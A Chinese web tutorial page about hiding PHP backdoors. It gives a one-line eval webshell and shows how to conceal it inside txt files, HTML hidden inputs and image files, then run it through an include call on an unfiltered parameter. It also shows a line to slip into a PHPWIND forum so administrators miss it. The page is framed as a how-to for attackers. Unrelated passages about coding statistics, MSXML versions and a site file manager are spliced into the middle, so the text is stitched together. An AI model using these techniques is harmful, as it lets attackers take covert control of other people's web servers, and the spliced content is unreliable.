当前位置:天才代写 > tutorial > 其他教程 > PHP网站后门的隐藏技巧测试报告总结

PHP网站后门的隐藏技巧测试报告总结

2018-05-22 08:00 星期二 所属: 其他教程 浏览:295

今天由小编为大家讲解有关语言编程的文章,在课课家共同了解语言编程其中不被重视的技巧相信对大家一定有很大的帮助

php教程要知道如果光把语句放到图片里是无论如何也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 :include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include(“x.gif”)这样的语句来调用隐藏在图片的木马语句。中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数,这就使得插入木马的性能得不到发挥。
include 函数在PHP中使用的比较频繁,所以引起的安全问题也实在太多,例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里,可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> 一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
PHP网站后门的隐藏技巧测试报告总结
well”我从事编程语言统计很多年了,有大量的数据来源包括代码存储库、Q&A讨论、招聘广告、社交媒体情况、教程页面访问、学习视频视图、开发者调查等等。数据发表在不同的时间,都可以被认为是精确的,
也可以被认为是有缺陷的,但是它们可以用于发现行业趋势。最后,不要期望一夜之间就变成一个编码忍者。有些人有一种天然的能力,但也是花了很多很多时间来磨练他们的技能,不断的学习新的技术和技巧。”
在过去三年中 XML 经历了许多反复,所以目前存在不同版本的 Microsoft XML 分析器也不奇怪。Internet Explorer 4.0 包含早期版本的 XML 分析器,它比 XSL、XML 数据或者大多数其他的 XML 技术(并且有完全不同的 DOM 模型)要早。该早期版本的分析器包含在 MSXML.dll 库中。从 MSDN XML 开发人员中心(英文)可将分析器升级到较新的一种。
  我们极力建议您升级到新的分析器,因为它要强大得多。Internet Explorer 5.0 包括 MSXML 2.0 分析器,它包含 XSL 和 XML 架构的基本版本。MSXML2 是 SQL Server 2000 附带的分析器版本。MSXML2 包含了许多性能增强的功能,并且在总体上提高了性能和可伸缩性。MSXML3 是当前作为“技术预览”附带的版本。MSXML3 包括 XSLT 和 XPath 支持以及 SAX 接口。

在网站维护中,站长朋友常常要对网站数据进行备份,以免出现意外情况而造成数据的损失。一般的下载备份方法不仅麻烦而且速度缓慢。这时我们就可以使用程序提供的文件压缩功能来快速进行网站数据的备份。
首先将需要备份的网站文件前的复选框选中,php实例教程然后点击“添加到压缩文件”超连接,接着在弹出的对话框中输入文件名称,注意一定要输入以zip为后缀的压缩文件格式。确定后稍等片刻,一个文件压缩包就制作完成了。只需要将其下载,放置在安全的地方保存就可以了。
在管理器主页面的功能菜单中选择“上传文件”按钮,将在网页最下方打开文件上传模块(如图2),点击“浏览”按钮选择本地文件,然后再点击上传即可。程序中的文件容量栏目会自动显示该文件占用网站空间的大小,文件大小会以KB或Byte两种单位显示。我们可以根据此功能方便的对网站文件进行整理归类操作;点击下载超连接可以将网站文件下载到本地硬盘,操作方式与普通下载方式无异,还可以使用迅雷等下载工具进行文件的高速下载;软件还提供了功能强大的编辑器(如图3),点击编辑连接后会显示文件的源代码,它还提供了本地预览与在线预览的功能,使网站文件的调试工作变得非常简单高效;

以下为引用的内容:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>

Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马<?eval($_POST[cmd]);?>粘贴到t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型PHP后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 密码里添入cmd就可以了,执行返回的结果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来,我们可以在HTML里加入一个隐藏属性的文本框 ,如:<input type=hidden value=”<?eval($_POST[cmd]);?>”> 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 <input type=hidden value=”C:\\\\Uniserver2_7s\\\\www\\\\test”> 我可以得到目录为 C:\\\\Uniserver2_7s\\\\www\\\\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。php视频教程我们可以直接对一个图片进行编辑,把<?eval($_POST[cmd]);?>插入到图片末尾。
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 <http://localhost/test/test.php?test=../1.jpg>我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。

文章很精彩,内心是否激情澎湃,是否还想了解更多关于视频教程的文章,课课家官网是一个知识的海洋

 

    关键字:

天才代写-代写联系方式